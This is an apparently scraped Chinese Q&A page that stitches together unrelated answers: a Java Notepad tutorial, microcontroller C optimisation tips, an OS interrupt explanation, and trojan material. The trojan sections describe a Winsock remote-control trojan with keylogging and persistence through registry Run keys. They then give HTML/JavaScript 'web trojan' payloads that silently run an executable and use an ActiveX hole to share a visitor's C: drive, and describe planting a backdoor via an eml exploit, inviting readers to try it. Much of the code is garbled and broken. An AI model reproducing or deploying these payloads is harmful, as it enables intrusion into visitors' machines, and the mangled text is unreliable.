如何用电脑记事本写程序（零基础学习，之前基本不用电脑，只用手机。）

1新建一个文本文档（以Hellojava为例）

用记事本打开，然后编写一个java程序，这里的类名要与文件名一致，后缀一定要修改为java

public class Hello{

public static void main(String arg[]){

Systemoutprintln("Hello World !");

}

}

2打开cmd，进入你所编写的java文件的目录(这里放在桌面)

输入：javac Hellojava 进行编译

之后就可以看到与你所编写的java文件同目录下出现了 Helloclass 说明编译成功

再输入 java Hello 执行

cmd中输出结果正确

当然，你应该先建立Java环境

/

>

由于单片机的性能同电脑的性能是天渊之别的，无论从空间资源上、内存资源、工作频率，都是无法

与之比较的。PC 机编程基本上不用考虑空间的占用、内存的占用的问题，最终目的就是实现功能就可以了。

对于单片机来说就截然不同了，一般的单片机的Flash 和Ram 的资源是以KB 来衡量的，可想而知，单片

机的资源是少得可怜，为此我们必须想法设法榨尽其所有资源，将它的性能发挥到最佳，程序设计时必须

遵循以下几点进行优化：

1 使用尽量小的数据类型

能够使用字符型(char)定义的变量，就不要使用整型(int)变量来定义；能够使用整型变量定义的变

量就不要用长整型(long int)，能不使用浮点型(float)变量就不要使用浮点型变量。当然，在定义变

量后不要超过变量的作用范围，如果超过变量的范围赋值，C 编译器并不报错，但程序运行结果却错了，

而且这样的错误很难发现。

2 使用自加、自减指令

通常使用自加、自减指令和复合赋值表达式(如a-=1 及a+=1 等)都能够生成高质量的

程序代码，编译器通常都能够生成inc 和dec 之类的指令，而使用a=a+1 或a=a-1 之类

的指令，有很多C 编译器都会生成二到三个字节的指令。

3 减少运算的强度

可以使用运算量小但功能相同的表达式替换原来复杂的的表达式。

（1） 求余运算

N= N %8 可以改为N = N &7

说明：位 *** 作只需一个指令周期即可完成，而大部分的C 编译器的“%”运算均是调用子程序来

完成，代码长、执行速度慢。通常，只要求是求2n 方的余数，均可使用位 *** 作的方法来代替。

（2） 平方运算

N=Pow(3,2) 可以改为N=33

说明：在有内置硬件乘法器的单片机中(如51 系列)，乘法运算比求平方运算快得多, 因为浮点数

的求平方是通过调用子程序来实现的，乘法运算的子程序比平方运算的子程序代码短，执行速度快。

（3） 用位移代替乘法除法

N=M8 可以改为N=M<<3

N=M/8 可以改为N=M>>3

说明：通常如果需要乘以或除以2n，都可以用移位的方法代替。如果乘以2n，都可以生成左移

的代码，而乘以其它的整数或除以任何数，均调用乘除法子程序。用移位的方法得到代码比调用乘除法子

程序生成的代码效率高。实际上，只要是乘以或除以一个整数，均可以用移位的方法得到结果。如N=M9

可以改为N=(M<<3)+M；

（4） 自加自减的区别

例如我们平时使用的延时函数都是通过采用自加的方式来实现。

void DelayNms(UINT16 t)

{

UINT16 i,j;

for(i=0;i<t;i++)

for(j=0;i<1000;j++)

}

可以改为

void DelayNms(UINT16 t)

{

UINT16 i,j;

for(i=t;i>=0;i--)

for(j=1000;i>=0;j--)

}

说明：两个函数的延时效果相似，但几乎所有的C 编译对后一种函数生成的代码均比前一种代码少1~3

个字节，因为几乎所有的MCU 均有为0 转移的指令，采用后一种方式能够生成这类指令。

4 while 与dowhile 的区别

void DelayNus(UINT16 t)

{

while(t--)

{

NOP();

}

}

可以改为

void DelayNus(UINT16 t)

{

do

{

NOP();

}while(--t)

}

说明：使用do…while 循环编译后生成的代码的长度短于while 循环。

5 register 关键字

void UARTPrintfString(INT8 str)

{

while(str && str)

{

UARTSendByte(str++)

}

}

可以改为

void UARTPrintfString(INT8 str)

{

register INT8 pstr=str;

while(pstr && pstr)

{

UARTSendByte(pstr++)

}

}

说明：在声明局部变量的时候可以使用register 关键字。这就使得编译器把变量放入一个多用途的寄存

器中，而不是在堆栈中，合理使用这种方法可以提高执行速度。函数调用越是频繁，越是可能提高代码的

速度，注意register 关键字只是建议编译器而已。

6 volatile 关键字

volatile 总是与优化有关，编译器有一种技术叫做数据流分析，分析程序中的变量在哪里赋值、在

哪里使用、在哪里失效，分析结果可以用于常量合并，常量传播等优化，进一步可以死代码消除。一般来

说,volatile 关键字只用在以下三种情况:

a) 中断服务函数中修改的供其它程序检测的变量需要加volatile(参考本书高级实验程序)

b) 多任务环境下各任务间共享的标志应该加volatile

c) 存储器映射的硬件寄存器通常也要加volatile 说明，因为每次对它的读写都可能由不同意义

总之，volatile 关键字是一种类型修饰符，用它声明的类型变量表示可以被某些编译器未知的因素

更改，比如： *** 作系统、硬件或者其它线程等。遇到这个关键字声明的变量，编译器对访问该变量的代码

就不再进行优化，从而可以提供对特殊地址的稳定访问。

问题或说没有你想要的答案，有些问题是没有正确答案或者很难回答的，希望珍惜大家的帮助！谢谢 （^_^)

这个问题需要详细回答 所以不要嫌多，学东西哪有容易的。

木马攻击原理

特洛伊木马是一个程序，它驻留在目标计算机里，可以随计算机自动启动并在某一端口进行侦听，在对接收的数据识别后，对目标计算机执行特定的 *** 作。木马，其实质只是一个通过端口进行通信的网络客户/服务程序。

1、基本概念:网络客户/服务模式的原理是一台主机提供服务(服务器)，另一台主机接受服务(客户机)。作为服务器的主机一般会打开一个默认的端口并进行监听(Listen), 如果有客户机向服务器的这一端口提出连接请求(Connect Request), 服务器上的相应程序就会自动运行，来应答客户机的请求，这个程序称为守护进程(UNIX的术语,不过已经被移植到了MS系统上)。对于特洛伊木马，被控制端就成为一台服务器，控制端则是一台客户机，G_serverexe是守护进程, G_client是客户端应用程序。

2、程序实现:

可以使用VB或VC的Winsock控件来编写网络客户/服务程序, 实现方法如下:

服务器端:

G_ServerLocalPort=7626(冰河的默认端口,可以改为别的值)

G_ServerListen(等待连接)

客户端:

G_ClientRemoteHost=ServerIP(设远端地址为服务器地址)

G_ClientRemotePort=7626(设远程端口为冰河的默认端口)

(在这里可以分配一个本地端口给G_Client, 如果不分配, 计算机将会自动分配一个)

G_ClientConnect(调用Winsock控件的连接方法)

一旦服务端接到客户端的连接请求ConnectionRequest,就接受连接

Private Sub G_Server_ConnectionRequest(ByVal requestID As Long)

G_ServerAccept requestID

End Sub

客户端用G_ClientSendData发送命令,而服务器在G_Server_DateArrive事件中接受并执行命令(几乎所有的木马功能都在这个事件处理程序中实现)

如果客户断开连接,则关闭连接并重新监听端口

Private Sub G_Server_Close()

G_ServerClose (关闭连接)

G_ServerListen(再次监听)

End Sub

客户端上传一个命令，服务端解释并执行命令。

3、实现木马的控制功能

由于Win98开放了所有的权限给用户，因此，以用户权限运行的木马程序几乎可以控制一切，下面仅对木马的主要功能进行简单的概述, 主要是使用Windows API函数。

（1）远程监控(控制对方鼠标、键盘，并监视对方屏幕)

keybd_event模拟一个键盘动作。

mouse_event模拟一次鼠标事件

mouse_event(dwFlags,dx,dy,cButtons,dwExtraInfo)dwFlags:

MOUSEEVENTF_ABSOLUTE 指定鼠标坐标系统中的一个绝对位置

MOUSEEVENTF_MOVE 移动鼠标

MOUSEEVENTF_LEFTDOWN 模拟鼠标左键按下

MOUSEEVENTF_LEFTUP 模拟鼠标左键抬起

MOUSEEVENTF_RIGHTDOWN 模拟鼠标右键按下

MOUSEEVENTF_RIGHTUP 模拟鼠标右键按下

dx,dy:MOUSEEVENTF_ABSOLUTE中的鼠标坐标

（2）记录各种口令信息

keylog begin：将击键记录在一个文本文件里，同时还记录执行输入的窗口名

（3）获取系统信息

a取得计算机名 GetComputerName

b更改计算机名 SetComputerName

c当前用户 GetUserName

d系统路径

Set FileSystem0bject = CreateObject("ScriptingFileSystemObject")(建立文件系统对象)

Set SystemDir = FileSystem0bjectgetspecialfolder(1)(取系统目录)

Set SystemDir = FileSystem0bjectgetspecialfolder(0)(取Windows安装目录)

e取得系统版本 GetVersionEx

f当前显示分辨率

Width = screenWidth\ screenTwipsPerPixelX

Height= screenHeight \ screenTwipsPerPixelY

（4）限制系统功能

a远程关机或重启计算机,使用WinAPI中的如下函数可以实现:

ExitWindowsEx(UINT uFlags,DWORD dwReserved)

当uFlags=EWX_LOGOFF 中止进程，然后注销

=EWX_SHUTDOWN 关掉系统但不关电源

=EWX_REBOOT 重新引导系统

=EWX_FORCE强迫中止没有响应的进程

=EWX_POWERDOWN 关掉系统及关闭电源

b锁定鼠标,ClipCursor(lpRect As RECT)可以将指针限制到指定区域,或者用ShowCursor(FALSE)把鼠标隐藏起来也可以，RECT是定义的一个矩形。

c让对方掉线 RasHangUp

d终止进程 ExitProcess

e关闭窗口 利用FindWindow函数找到窗口并利用SendMessage函数关闭窗口

（5）远程文件 *** 作

删除文件：File delete

拷贝文件：File copy

共享文件：Export list（列出当前共享的驱动器、目录、权限及共享密码）

（6）注册表 *** 作

在VB中只要Set RegEdit=CreateObject（"WScriptShell")就可以使用以下的注册表功能:

删除键值:RegEditRegDelete RegKey

增加键值:RegEditWrite RegKey,RegValue

获取键值:RegEditRegRead (Value)

三、特洛伊木马隐身方法

木马程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。在任务管理器中隐形：将程序设为“系统服务”可以伪装自己。当然它也会悄无声息地启动，木马会在每次用户启动时自动装载服务端，Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、winini、systemini、注册表等等都是“木马”藏身的好地方。

在winini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成commandexe文件，如果不注意可能不会发现它不是真正的系统启动文件。

在systemini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorerexe”，如果不是“explorerexe”，而是“shell= explorerexe 程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至：“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v10木马”，它将注册表“HKEY－LOCAL－MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的 Explorer 键值改为Explorer=“C:\WINDOWS\expiorerexe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如：“HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY－USERS\＊＊＊＊\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能，最好的办法就是在“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名，再在整个注册表中搜索即可。

目前,除了上面介绍的隐身技术外,更新、更隐蔽的方法已经出现，那就是-驱动程序及动态链接库技术。驱动程序及动态链接库技术和一般的木马不同，它基本上摆脱了原有的木马模式-监听端口，而采用替代系统功能的方法（改写驱动程序或动态链接库）。这样做的结果是：系统中没有增加新的文件（所以不能用扫描的方法查杀）、不需要打开新的端口（所以不能用端口监视的方法查杀）、没有新的进程（所以使用进程查看的方法发现不了它，也不能用kill进程的方法终止它的运行）。在正常运行时木马几乎没有任何的症状,而一旦木马的控制端向被控端发出特定的信息后,隐藏的程序就立即开始运作。

四、 特洛伊木马防御原理

知道了木马的攻击原理和隐身方法，我们就可以采取措施进行防御了。

1端口扫描

端口扫描是检查远程机器有无木马的最好办法, 端口扫描的原理非常简单, 扫描程序尝试连接某个端口, 如果成功, 则说明端口开放,如果失败或超过某个特定的时间(超时), 则说明端口关闭。但对于驱动程序/动态链接木马, 扫描端口是不起作用的。

2查看连接接

查看连和端口扫描的原理基本相同，不过是在本地机上通过netstat -a（或某个第三方程序）查看所有的TCP/UDP连接，查看连接要比端口扫描快，但同样是无法查出驱动程序/动态链接木马,而且仅仅能在本地使用。

3检查注册表

上面在讨论木马的启动方式时已经提到，木马可以通过注册表启动（好像现在大部分的木马都是通过注册表启动的，至少也把注册表作为一个自我保护的方式），那么，我们同样可以通过检查注册表来发现冰河在注册表里留下的痕迹。

4查找文件

查找木马特定的文件也是一个常用的方法，木马的一个特征文件是kernl32exe,另一个是sysexlprexe，只要删除了这两个文件,木马就已经不起作用了。如果你只是删除了sysexlprexe而没有做扫尾工作的话,可能会遇到一些麻烦-就是你的文本文件打不开了, sysexplrexe是和文本文件关联的,你还必须把文本文件跟notepad关联上。

另外，对于驱动程序/动态链接库木马，有一种方法可以试试，使用Windows的"系统文件检查器"，通过"开始菜单"-"程序"-"附件"-"系统工具"-"系统信息"-"工具"可以运行"系统文件检查器", 用“系统文件检查器”可检测 *** 作系统文件的完整性，如果这些文件损坏，检查器可以将其还原，检查器还可以从安装盘中解压缩已压缩的文件（如驱动程序）。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了,就有可能是木马(或者损坏了),提取改动过的文件可以保证你的系统安全和稳定。

制作网页木马原理

大家对木马都不陌生了，它可能要算是计算机病毒史上最厉害的了，相信会使木马的人千千万万，但是有很多人苦于怎么把木马发给对方，现在随着计算机的普及，在网络上我相信很少有人会再轻易的接收对方的文件了，所以网页木马诞生了。

1它应该算是html带动同路径下的一个exe的文件的主页了，也就是当浏览器浏览这个页面的时候，一个exe的文件就在后台自动下载并执行了，可以做一个testhtml的文件在桌面，内容如下：

<script language="javascript">

run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""

run_exe+="CODEBASE=\"testexe#version=1,1,1,1\">"

run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"

run_exe+="</OBJECT>"

run_exe+="<HTML><H1>网页加载中，请稍后</H1></HTML>";

documentopen();

documentclear();

documentwriteln(run_exe);

documentclose();

</script>

再在桌面下随便找个exe的文件，名字一定要改为tsetexe，好了，这时候双击我们刚才生成的html文件，当看到“网页加载中，请稍后”的时候，我们的那个同路径下的exe文件也被无条件执行了，这种页面的优点就是编译修改简单，但是！当你申请下了一个个人主页空间的时候，把这两个文件上传上去的时候，当你试图通过浏览器浏览你的杰作的时候，ie的安全警告跳了出来，我想没有几个人愿意乖乖的冒着风险去点“是”，好了，尽管这个网页木马在本地是多么的完美，但是放到了网上就通不过ie的安全策略了，这个小马失败了。

2是通过ie自身的漏洞写入注册表，相信很多人经常在浏览一些主页的时候，注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等，这些都是自动修改了你的注册表的网页的杰作，所以我门也可以做个页面让浏览者的硬盘完全共享，也是做个html的文件，内容如下：

script language=javascript>

documentwrite("<APPLET HEIGHT=0 WIDTH=0 code=commsactiveXActiveXComponent></APPLET>");

function f(){

a1=documentapplets[0];

a1setCLSID("");

a1createInstance();

Shl = a1GetObject();

ShlRegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");

ShlRegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"

);

ShlRegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");

}

function init()

{

setTimeout("f()", 1000);

}

init();

</script>

当对方的浏览过这个页面的时候，他的c:就被共享了，共享后的进入方法嘛呵呵不用说了吧，但是他虽然被共巷了，但是你还不知道谁正在看你的这个页面，他的ip又是多少你都不知道，没有关系，有个很简单的方法，去163申请一个域名的转换，如：连接目标地址里褪q蚕砹�恿恕/a>

这种网页木马的特点是比较安全，不宜被对方发现，但是使用麻烦需要牵扯到很多的东西。

3也是现在最好用的一种了吧，个人认为。它是将一个小巧的exe文件作成一个eml的文件，再用ie的漏洞让一个html的页面执行这个eml的文件，你的那个小巧的exe文件就被执行了，由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出，下面给出一个地址实际上就是一个转憧梢酝ü齮elnet xxxx 3389来完全控制对方（这个5k的小后门是winshell50黑白网络有下，同时这个winshell50还有一个很出色的功能，就是能下载一个你事先设置好的指定路径下的一个文件，并执行他，我放置的是网络深偷，如果你的杀毒软件够厉害的话，神偷是可以被查出来的，这里只是实验，实际中可以指定很多查不到的小马，这里不阐述），有兴趣的朋友可以来试试。

这种网页木马的特点是，对方挨种率较高，除了制作麻烦一点外，没有什么缺点啦

好了所有的漏洞都是建立在系统漏洞的前提下，多升级多打补丁没有坏处

另外,团IDC网上有许多产品团购,便宜有口碑

书上这个地方没详细做解释

不过结合全书尤其是第102页的“553 I/O中断事件的处理”就可理解

按你举的例子，可以这么看：

进程P2等待的磁盘传输信息结束后，

通道便会产生“I/O正常结束”的中断请求CPU进行干预，

那么进程P1就要让出CPU而由中断处理进程占用CPU对中断事件进行处理，

（这时就引起了进程的切换）

处理中包括把进程P2由“等待”状态变成“就绪”状态，

处理完后中断处理进程让出CPU，由进程调度程序从就绪队列中选中一个进程占用CPU。

以上就是关于如何用电脑记事本写程序（零基础学习，之前基本不用电脑，只用手机。）全部的内容，包括:如何用电脑记事本写程序（零基础学习，之前基本不用电脑，只用手机。）、刚刚学习单片机，谁可以帮忙写个程序、如何写出高效的单片机C语言程序代码等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！